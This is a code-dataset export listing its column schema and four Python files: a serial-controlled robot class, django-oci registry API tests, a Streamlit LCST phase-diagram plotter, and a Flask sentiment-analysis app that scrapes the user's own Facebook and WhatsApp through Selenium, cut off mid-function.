Dataset schema (113 columns):

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
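
A row with this schema can be loaded and spot-checked programmatically. The sketch below is illustrative only: it assumes the rows sit in a local Parquet file (`data.parquet` is a hypothetical path), and the recomputed statistics approximate the stored columns rather than reproducing the pipeline's exact definitions.

```python
# Minimal sketch: load one row and compare a few simple per-file statistics
# against the stored columns. The file path is a hypothetical placeholder.
import pandas as pd

df = pd.read_parquet("data.parquet")  # hypothetical path
row = df.iloc[0]

lines = row["content"].splitlines()
avg_line_length = sum(len(line) for line in lines) / len(lines)
max_line_length = max(len(line) for line in lines)
alphanum_fraction = sum(ch.isalnum() for ch in row["content"]) / len(row["content"])

# These should be close to the stored values, though the original pipeline's
# exact counting rules may differ slightly.
print(avg_line_length, row["avg_line_length"])
print(max_line_length, row["max_line_length"])
print(alphanum_fraction, row["alphanum_fraction"])
```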
---
Record 1 | hexsha: 887ad1b6a09fd7cd401ad5b4a47a80e80503fdb2 | size: 3,177 | ext: py | lang: Python
repo_path: software/robotClass.py | repo_name: technovus-sfu/swarmbots | head_hexsha: 6a50193a78056c0359c426b097b96e1c37678a55 | licenses: ["MIT"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count: null (stars event datetimes: null) | max_issues_count: 3 (issues events 2018-02-05T23:21:02.000Z to 2018-05-03T02:58:50.000Z) | max_forks_count: null (forks event datetimes: null)
content:
import serial
import string
import math
from itertools import chain
class robot:
address = "/dev/cu.HC-05-DevB"
speed = 0;
current_position = [0,0,0]
target_position = [0, 0]
distance = 0;
angle_diff = 0;
compliment = 0;
colorLower = [0,0,0]
colorUpper = [0,0,0]
ID = 0
# def __init__ (self):
# pass
#
def __init__ (self, colorL, colorU, ID = None):
self.colorLower = colorL
self.colorUpper = colorU
self.ID = ID
#
# set address and target
def initialize_port(self, address, target):
self.address = address
self.target_position = target
self.port = serial.Serial(address, 9600)
# method to move the robot
def move(self):
self.calc_dist_angle()
# print ("angle ", self.angle_diff, "distance", self.distance, "compliment", self.compliment)
if 20 <= abs(self.compliment) <= 160 and self.distance > 100:
print ("orientating")
self.orient()
elif self.distance > 170:
# print ("moving")
if 160 <= abs(self.angle_diff) <= 200:
# print ("should go forward")
self.forward()
            # range objects cannot be concatenated with + in Python 3; chain them instead
            elif math.floor(abs(self.angle_diff)) in chain(range(0, 20), range(340, 360)):
# print ("should go backward")
self.backward()
#
else:
self.stop();
# method to find the required orientation
def orient(self):
if abs(self.speed) > 0.5:
self.speed = 0
#
left_turn_conditions = chain(range(-90,0),range(90,180),range(-270,-180),range(270,360))
right_turn_conditions = chain(range(0,90),range(-180,-90),range(180, 270),range(-360,-270))
if math.floor(self.angle_diff) in left_turn_conditions and (self.speed > -0.5):
print ("left")
self.port.write(bytearray("a","utf-8"))
self.speed = self.speed - 0.5
elif math.floor(self.angle_diff) in right_turn_conditions and (self.speed < 0.5):
print ("right")
self.port.write(bytearray("d","utf-8"))
self.speed = self.speed + 0.5
# method to move the robot forward
def forward(self):
if abs(self.speed) == 0.5:
self.speed = 0
#
ratio = int(math.ceil((self.distance*8)/1000))
if self.speed < 2:
# for i in range(0,ratio):
print ("forward ", ratio, self.speed)
self.port.write(bytearray("w","utf-8"))
self.speed = self.speed+1;
# method to move the robot backward
def backward(self):
ratio = int(math.ceil((self.distance*8)/1000))
if self.speed > -2:
print ("backward", ratio, self.speed)
# for i in range(0,ratio):
self.port.write(bytearray("s","utf-8"))
self.speed = self.speed-1;
# method to stop the robot
def stop(self):
self.port.write(bytearray("q","utf-8"))
self.speed = 0
# method to calculate the distance between robot and target and orientation difference
def calc_dist_angle(self):
x_delta = self.target_position[0] - self.current_position[0]
y_delta = self.target_position[1] - self.current_position[1]
self.distance = math.hypot(x_delta, y_delta)
required_orientation = math.atan2(y_delta, x_delta) * 180/math.pi
current_orientation = self.current_position[2]
self.angle_diff = (required_orientation - current_orientation)
        # calculate the complement of the angle, folded into [0, 180), in each quadrant
self.compliment = abs(self.angle_diff) - math.floor( abs(self.angle_diff)/180 )*180
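# Worked example (illustrative numbers added for clarity, not in the original
# source): with current_position = [0, 0, 90] and target_position = [300, 400],
# calc_dist_angle() yields distance = hypot(300, 400) = 500.0,
# required_orientation = atan2(400, 300) * 180/pi ~ 53.13 degrees,
# angle_diff ~ 53.13 - 90 = -36.87, and compliment = 36.87 - 0*180 = 36.87,
# so move() would call orient() first (20 <= 36.87 <= 160 and distance > 100).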
avg_line_length: 27.868421 | max_line_length: 95 | alphanum_fraction: 0.678942
qsc_code_*_quality_signal columns:
num_words: 486 | num_chars: 3,177 | mean_word_length: 4.339506 | frac_words_unique: 0.22428
frac_chars_top_2grams: 0.081081 | top_3grams: 0.042674 | top_4grams: 0.031294
frac_chars_dupe_5grams: 0.241821 | dupe_6grams: 0.217165 | dupe_7grams: 0.154576 | dupe_8grams: 0.154576 | dupe_9grams: 0.100522 | dupe_10grams: 0.071124
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.054455 | frac_chars_whitespace: 0.173434
size_file_byte: 3,177 | num_lines: 113 | num_chars_line_max: 96 | num_chars_line_mean: 28.115044
frac_chars_alphabet: 0.748667 | frac_chars_comments: 0.17847 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.068493 | cate_autogen: 0
frac_lines_long_string: 0 | frac_chars_string_length: 0.032458 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.109589 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.054795 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.315068 | frac_lines_print: 0.068493
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 2 | hexsha: 887d7ad21774f9d78fa33b58dec3b6e2af7b8b30 | size: 13,930 | ext: py | lang: Python
repo_path: tests/test_api.py | repo_name: vsoch/django-oci | head_hexsha: e60b2d0501ddd45f6ca3596b126180bebb2e6903 | licenses: ["Apache-2.0"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count: 5 (stars events 2020-03-24T23:45:28.000Z to 2021-11-26T03:31:05.000Z) | max_issues_count: 14 (issues events 2020-04-02T17:13:28.000Z to 2020-12-29T12:36:38.000Z) | max_forks_count: null (forks event datetimes: null)
content:
"""
test_django-oci api
-------------------
Tests for `django-oci` api.
"""
from django.urls import reverse
from django.contrib.auth.models import User
from django_oci import settings
from rest_framework import status
from rest_framework.test import APITestCase
from django.test.utils import override_settings
from time import sleep
from unittest import skipIf
import subprocess
import requests
import hashlib
import base64
import json
import os
import re
here = os.path.abspath(os.path.dirname(__file__))
# Regex to parse key="value" pairs out of the Www-Authenticate header
auth_regex = re.compile(r'(\w+)[:=] ?"?([^"]+)"?')
# Important: user needs to be created globally to be seen
user, _ = User.objects.get_or_create(username="dinosaur")
token = str(user.auth_token)
def calculate_digest(blob):
"""Given a blob (the body of a response) calculate the sha256 digest"""
hasher = hashlib.sha256()
hasher.update(blob)
return hasher.hexdigest()
def get_auth_header(username, password):
"""django oci requires the user token as the password to generate a longer
auth token that will expire after some number of seconds
"""
auth_str = "%s:%s" % (username, password)
auth_header = base64.b64encode(auth_str.encode("utf-8"))
return {"Authorization": "Basic %s" % auth_header.decode("utf-8")}
def get_authentication_headers(response):
"""Given a requests.Response, assert that it has status code 401 and
provides the Www-Authenticate header that can be parsed for the request
"""
assert response.status_code == 401
assert "Www-Authenticate" in response.headers
matches = dict(auth_regex.findall(response.headers["Www-Authenticate"]))
for key in ["scope", "realm", "service"]:
assert key in matches
# Prepare authentication headers and get token
headers = get_auth_header(user.username, token)
url = "%s?service=%s&scope=%s" % (
matches["realm"],
matches["service"],
matches["scope"],
)
# With proper headers should be 200
auth_response = requests.get(url, headers=headers)
assert auth_response.status_code == 200
body = auth_response.json()
# Make sure we have the expected fields
for key in ["token", "expires_in", "issued_at"]:
assert key in body
# Formulate new auth header
return {"Authorization": "Bearer %s" % body["token"]}
def read_in_chunks(image, chunk_size=1024):
"""Helper function to read file in chunks, with default size 1k."""
while True:
data = image.read(chunk_size)
if not data:
break
yield data
def get_manifest(config_digest, layer_digest):
"""A dummy image manifest with a config and single image layer"""
return json.dumps(
{
"schemaVersion": 2,
"config": {
"mediaType": "application/vnd.oci.image.config.v1+json",
"size": 7023,
"digest": config_digest,
},
"layers": [
{
"mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"size": 32654,
"digest": layer_digest,
}
],
"annotations": {"com.example.key1": "peas", "com.example.key2": "carrots"},
}
)
class APIBaseTests(APITestCase):
def setUp(self):
self.process = subprocess.Popen(["python", "manage.py", "runserver"])
sleep(2)
def tearDown(self):
os.kill(self.process.pid, 9)
def test_api_version_check(self):
"""
GET of /v2 should return a 200 response.
"""
url = reverse("django_oci:api_version_check")
response = self.client.get(url, format="json")
self.assertEqual(response.status_code, status.HTTP_200_OK)
class APIPushTests(APITestCase):
def push(
self,
digest,
data,
content_type="application/octet-stream",
test_response=True,
extra_headers={},
):
url = "http://127.0.0.1:8000%s?digest=%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository}),
digest,
)
print("Single Monolithic POST: %s" % url)
headers = {
"Content-Length": str(len(data)),
"Content-Type": content_type,
}
headers.update(extra_headers)
response = requests.post(url, data=data, headers=headers)
if test_response:
self.assertTrue(
response.status_code
in [status.HTTP_202_ACCEPTED, status.HTTP_201_CREATED]
)
return response
def test_push_post_then_put(self):
"""
POST /v2/<name>/blobs/uploads/
PUT /v2/<name>/blobs/uploads/
"""
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository})
)
print("POST to request session: %s" % url)
headers = {"Content-Type": "application/octet-stream"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
blob_url = "http://127.0.0.1:8000%s?digest=%s" % (
response.headers["Location"],
self.digest,
)
# PUT to upload blob url
headers = {
"Content-Length": str(len(self.data)),
"Content-Type": "application/octet-stream",
}
headers.update(auth_headers)
print("PUT to upload: %s" % blob_url)
response = requests.put(blob_url, data=self.data, headers=headers)
# This should allow HTTP_202_ACCEPTED too
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Test upload request from another repository
non_standard_name = "conformance-aedf05b6-6996-4dae-ad18-70a4db9e9061"
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": non_standard_name})
)
url = "%s?mount=%s&from=%s" % (url, self.digest, self.repository)
print("POST to request mount from another repository: %s" % url)
headers = {"Content-Type": "application/octet-stream"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
assert "Location" in response.headers
assert non_standard_name in response.headers["Location"]
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_push_chunked(self):
"""
POST /v2/<name>/blobs/uploads/
PATCH <location>
PUT /v2/<name>/blobs/uploads/
"""
url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:blob_upload", kwargs={"name": self.repository})
)
print("POST to request chunked session: %s" % url)
headers = {"Content-Type": "application/octet-stream", "Content-Length": "0"}
response = requests.post(url, headers=headers)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.post(url, headers=headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
session_url = "http://127.0.0.1:8000%s" % response.headers["Location"]
# Read the file in chunks, for each do a patch
start = 0
with open(self.image, "rb") as fd:
for chunk in read_in_chunks(fd):
if not chunk:
break
end = start + len(chunk) - 1
content_range = "%s-%s" % (start, end)
headers = {
"Content-Range": content_range,
"Content-Length": str(len(chunk)),
"Content-Type": "application/octet-stream",
}
headers.update(auth_headers)
start = end + 1
print("PATCH to upload content range: %s" % content_range)
response = requests.patch(session_url, data=chunk, headers=headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
self.assertTrue("Location" in response.headers)
# Finally, issue a PUT request to close blob
session_url = "%s?digest=%s" % (session_url, self.digest)
response = requests.put(session_url, headers=auth_headers)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
def test_push_view_delete_manifest(self):
"""
PUT /v2/<name>/manifests/<reference>
DELETE /v2/<name>/manifests/<reference>
"""
url = "http://127.0.0.1:8000%s" % (
reverse(
"django_oci:image_manifest",
kwargs={"name": self.repository, "tag": "latest"},
)
)
print("PUT to create image manifest: %s" % url)
# Calculate digest for config (yes, we haven't uploaded the blob, it's ok)
with open(self.config, "r") as fd:
content = fd.read()
config_digest = calculate_digest(content.encode("utf-8"))
# Prepare the manifest (already a text string)
manifest = get_manifest(config_digest, self.digest)
manifest_reference = "sha256:%s" % calculate_digest(manifest.encode("utf-8"))
headers = {
"Content-Type": "application/vnd.oci.image.manifest.v1+json",
"Content-Length": str(len(manifest)),
}
response = requests.put(url, headers=headers, data=manifest)
auth_headers = get_authentication_headers(response)
headers.update(auth_headers)
response = requests.put(url, headers=headers, data=manifest)
# Location must be in response header
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertTrue("Location" in response.headers)
# test manifest download
response = requests.get(url, headers=auth_headers).json()
for key in ["schemaVersion", "config", "layers", "annotations"]:
assert key in response
# Retrieve newly created tag
tags_url = "http://127.0.0.1:8000%s" % (
reverse("django_oci:image_tags", kwargs={"name": self.repository})
)
print("GET to list tags: %s" % tags_url)
tags = requests.get(tags_url, headers=auth_headers)
self.assertEqual(tags.status_code, status.HTTP_200_OK)
tags = tags.json()
for key in ["name", "tags"]:
assert key in tags
# First delete tag (we are allowed to have an untagged manifest)
response = requests.delete(url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
# Finally, delete the manifest
url = "http://127.0.0.1:8000%s" % (
reverse(
"django_oci:image_manifest",
kwargs={"name": self.repository, "reference": manifest_reference},
)
)
response = requests.delete(url, headers=auth_headers)
self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
def test_push_single_monolithic_post(self):
"""
POST /v2/<name>/blobs/uploads/
"""
# Push the image blob, should return 401 without authentication
response = self.push(digest=self.digest, data=self.data, test_response=False)
headers = get_authentication_headers(response)
response = self.push(
digest=self.digest,
data=self.data,
test_response=False,
extra_headers=headers,
)
assert response.status_code == 201
assert "Location" in response.headers
download_url = add_url_prefix(response.headers["Location"])
response = requests.get(download_url, headers=headers if headers else None)
self.assertEqual(response.status_code, status.HTTP_200_OK)
# Upload an image manifest
with open(self.config, "r") as fd:
content = fd.read().encode("utf-8")
config_digest = calculate_digest(content)
self.push(digest=config_digest, data=content, extra_headers=headers)
def setUp(self):
self.repository = "vanessa/container"
self.image = os.path.abspath(
os.path.join(here, "..", "examples", "singularity", "busybox_latest.sif")
)
self.config = os.path.abspath(
os.path.join(here, "..", "examples", "singularity", "config.json")
)
# Read binary data and calculate sha256 digest
with open(self.image, "rb") as fd:
self.data = fd.read()
self._digest = calculate_digest(self.data)
self.digest = "sha256:%s" % self._digest
def add_url_prefix(download_url):
if not download_url.startswith("http"):
download_url = "http://127.0.0.1:8000%s" % download_url
return download_url
avg_line_length: 37.245989 | max_line_length: 87 | alphanum_fraction: 0.618808
qsc_code_*_quality_signal columns:
num_words: 1,646 | num_chars: 13,930 | mean_word_length: 5.106318 | frac_words_unique: 0.179222
frac_chars_top_2grams: 0.026175 | top_3grams: 0.034265 | top_4grams: 0.030934
frac_chars_dupe_5grams: 0.445687 | dupe_6grams: 0.404997 | dupe_7grams: 0.372873 | dupe_8grams: 0.3674 | dupe_9grams: 0.353599 | dupe_10grams: 0.310767
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.024093 | frac_chars_whitespace: 0.264034
size_file_byte: 13,930 | num_lines: 373 | num_chars_line_max: 88 | num_chars_line_mean: 37.345845
frac_chars_alphabet: 0.795747 | frac_chars_comments: 0.130366 | cate_xml_start: 0 | frac_lines_dupe_lines: 0.280303 | cate_autogen: 0
frac_lines_long_string: 0 | frac_chars_string_length: 0.158076 | frac_chars_long_word_length: 0.044228 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0.117424
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.056818 | cate_var_zero: false | frac_lines_pass: 0.007576 | frac_lines_import: 0.056818 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.143939 | frac_lines_print: 0.030303
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 3 | hexsha: 887d7f78ede177237d678a89bcd14f2af84d31d3 | size: 1,492 | ext: py | lang: Python
repo_path: LCSTPlotter.py | repo_name: edwinstorres/LCST-Plotter | head_hexsha: 1afbd251cc395461498e902069e90bb14e66b013 | licenses: ["MIT"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count, max_issues_count, max_forks_count: all null (all event datetimes: null)
content:
#LCST Plotter
#Author: ESTC
import numpy
import streamlit
import matplotlib.pyplot as plt
import pandas
def launch_app():
streamlit.title("LCST Plotter")
global cation, anion, mw_cat, mw_an, datafile
cation = streamlit.text_input("Enter the abbreviation of the cation:")
# mw_cat = streamlit.text_input("Enter the molecular weight of the cation:")
    anion = streamlit.text_input("Enter the abbreviation of the anion:")
# mw_an = streamlit.text_input("Enter the molecular weight of the anion:")
T_start = streamlit.text_input("Enter start temperature in °C")
streamlit.text_input("Enter your initials:")
datafile = streamlit.file_uploader("Upload the LCST file:",type="xlsx")
def load_data(datafile):
global T,x1a,x1b,x1
data = pandas.read_excel(datafile)
T = data['T']-273.15
x1a = data["x'1"]
x1b = data['x"1']
# x1 =
streamlit.dataframe(data)
def make_plot(x1a,x1b,T,cation,anion):
fig,ax = plt.subplots()
ax.set_title("Predicted Phase Diagram of Aqueous ["+cation+"]["+anion+"]")
ax.scatter(x1a,T,marker=".",c="blue")
ax.scatter(x1b,T,marker=".",c="blue")
ax.set_xlabel("Water Mole Fraction")
ax.set_xlim([0,1.05])
ax.set_ylabel("Temperature (°C)")
ax.set_ylim([0,150])
plt.savefig(cation+"_"+anion+".png")
streamlit.pyplot(fig)
launch_app()
if datafile is not None:
load_data(datafile)
make_plot(x1a,x1b,T,cation,anion)
avg_line_length: 32.434783 | max_line_length: 81 | alphanum_fraction: 0.661528
qsc_code_*_quality_signal columns:
num_words: 216 | num_chars: 1,492 | mean_word_length: 4.462963 | frac_words_unique: 0.398148
frac_chars_top_2grams: 0.068465 | top_3grams: 0.112033 | top_4grams: 0.143154
frac_chars_dupe_5grams: 0.232365 | dupe_6grams: 0.149378 | dupe_7grams: 0.149378 | dupe_8grams: 0.095436 | dupe_9grams: 0.095436 | dupe_10grams: 0
frac_chars_replacement_symbols: 0 | frac_chars_digital: 0.022556 | frac_chars_whitespace: 0.197721
size_file_byte: 1,492 | num_lines: 45 | num_chars_line_max: 82 | num_chars_line_mean: 33.155556
frac_chars_alphabet: 0.781119 | frac_chars_comments: 0.118633 | cate_xml_start: 0 | frac_lines_dupe_lines: 0 | cate_autogen: 0
frac_lines_long_string: 0 | frac_chars_string_length: 0.202532 | frac_chars_long_word_length: 0 | frac_lines_string_concat: 0 | cate_encoded_data: 0 | frac_chars_hex_words: 0 | frac_lines_prompt_comments: 0 | frac_lines_assert: 0
qsc_codepython_*_quality_signal columns:
cate_ast: 1 | frac_lines_func_ratio: 0.088235 | cate_var_zero: false | frac_lines_pass: 0 | frac_lines_import: 0.117647 | frac_lines_simplefunc: 0 | score_lines_no_logic: 0.205882 | frac_lines_print: 0
Raw qsc_code_* / qsc_codepython_* columns (the duplicates without the _quality_signal suffix): all 0, except qsc_code_frac_words_unique and qsc_code_frac_lines_string_concat, which are null.
effective: 1 | hits: 0
---
Record 4 | hexsha: 887dda35242cbfb0d65a1b78e9d2c415c3d774ec | size: 13,039 | ext: py | lang: Python
repo_path: hello.py | repo_name: zarqabiqbal/RTDA-Real-Time-Data-Analysis-ML-Project- | head_hexsha: 0659191afa6a8802647f46d0dc4f85f2044639e5 | licenses: ["Apache-2.0"] (identical across the max_stars / max_issues / max_forks column groups)
max_stars_count, max_issues_count, max_forks_count: all null (all event datetimes: null)
content:
#!/usr/bin/env python3
from flask import Flask, render_template, app, url_for,request
import tweepy # To consume Twitter's API
import pandas as pd # To handle data
import numpy as np # For number computing
from textblob import TextBlob
import re
import pandas as pa
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from nltk.corpus import stopwords
import time
import itertools
app=Flask(__name__)
@app.route('/')
@app.route('/index')
def index():
return render_template('index2.html')
@app.route('/index2')
def index2():
return render_template('index.html')
@app.route('/layout')
def layout():
return render_template('layout.html')
@app.route('/home')
def home():
return render_template('home.html')
@app.route('/Sentiment_Search', methods=['POST'])
def Sentiment_Search():
search=request.form['search_Text']
sid = SentimentIntensityAnalyzer()
ss = sid.polarity_scores(search)
neg = float(ss['neg']*100)
neu = float(ss['neu']*100)
pos = float(ss['pos']*100)
compound =float(ss['compound']*100)
ok=1
return render_template("home.html",okk=ok,negg=neg,neuu=neu,poss=pos,comm=compound,srch=search)
@app.route('/facebook', methods=['POST'])
def facebook():
try:
driver = webdriver.Firefox()
driver.get("https://www.facebook.com")
wait = WebDriverWait(driver, 600)
u_id = wait.until(EC.presence_of_element_located((By.XPATH,'//div[@class="_1k67 _cy7"]')))
u_id.click()
x=0
while x<1000:
driver.execute_script("window.scrollBy(0,2000)")
time.sleep(1)
x=x+50
status=driver.find_elements_by_xpath('//div[@class="_1dwg _1w_m _q7o"]')
stdetails=[]
for i in status:
stdetails.append(i.text)
status_details=[]
for i in stdetails:
status_details.append(i.split())
tokenized=list(itertools.chain.from_iterable(status_details))
#remove punctuation from list
tokenized=[i for i in tokenized if i.lower() not in stopwords.words('english')]
sid = SentimentIntensityAnalyzer()
neg=0
neu=0
pos=0
compound=0
for sentence in tokenized:
ss = sid.polarity_scores(sentence)
neg = neg+ float(ss['neg'])
neu = neu +float(ss['neu'])
pos = pos + float(ss['pos'])
compound = compound+float(ss['compound'])
total=neg+neu+pos+compound
negative=(neg/total)*100
neutral=(neu/total)*100
positive=(pos/total)*100
compound=((compound/total)*100)
if negative > neutral and negative > positive and negative > compound:
greatest=negative
great="Highest Polarity is of Negative"
if neutral > positive and neutral > negative and neutral > compound:
greatest=neutral
great="Highest Polarity is of Neutral"
if positive > neutral and positive > negative and positive > compound:
greatest=positive
great="Highest Polarity is of Positive"
        if compound > neutral and compound > negative and compound > positive:
            greatest=compound
            great="Highest Polarity is of Compound"
greatest= float("{0:.2f}".format(greatest))
driver.close()
return render_template('facebook_output.html',negg=negative,poss=positive,neuu=neutral,compp=compound,great_per=greatest,str_var=great)
except:
err=1
titleshow="Some Error !! try again ......."
return render_template("whatsapp.html",error=titleshow,condition=err)
@app.route('/whatsappAnalysis', methods=['POST'])
def whatsappAnalysis():
target=request.form['conversation_id']
try:
driver = webdriver.Firefox()
driver.get("https://web.whatsapp.com/")
wait = WebDriverWait(driver, 600)
x_arg = '//span[contains(@title, '+ '"' +target + '"'+ ')]'
person_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))
person_title.click()
x=-50
chat=[]
while x > -2000:
element=driver.find_element_by_xpath("//div[@class='_9tCEa']")
driver.execute_script("arguments[0].scrollIntoView(500);",element);
x=x-100
time.sleep(1)
textget=driver.find_elements_by_class_name("selectable-text.invisible-space.copyable-text")
print("Number of tweets extracted: {}.\n".format(len(textget)))
for Text in textget:
chat.append(Text.text)
menu=driver.find_elements_by_class_name("rAUz7")
menu[2].click()
list=driver.find_elements_by_class_name("_10anr.vidHz._28zBA")
list[5].click()
a=len(chat)
b=int(a/2)
data=chat[b:a]
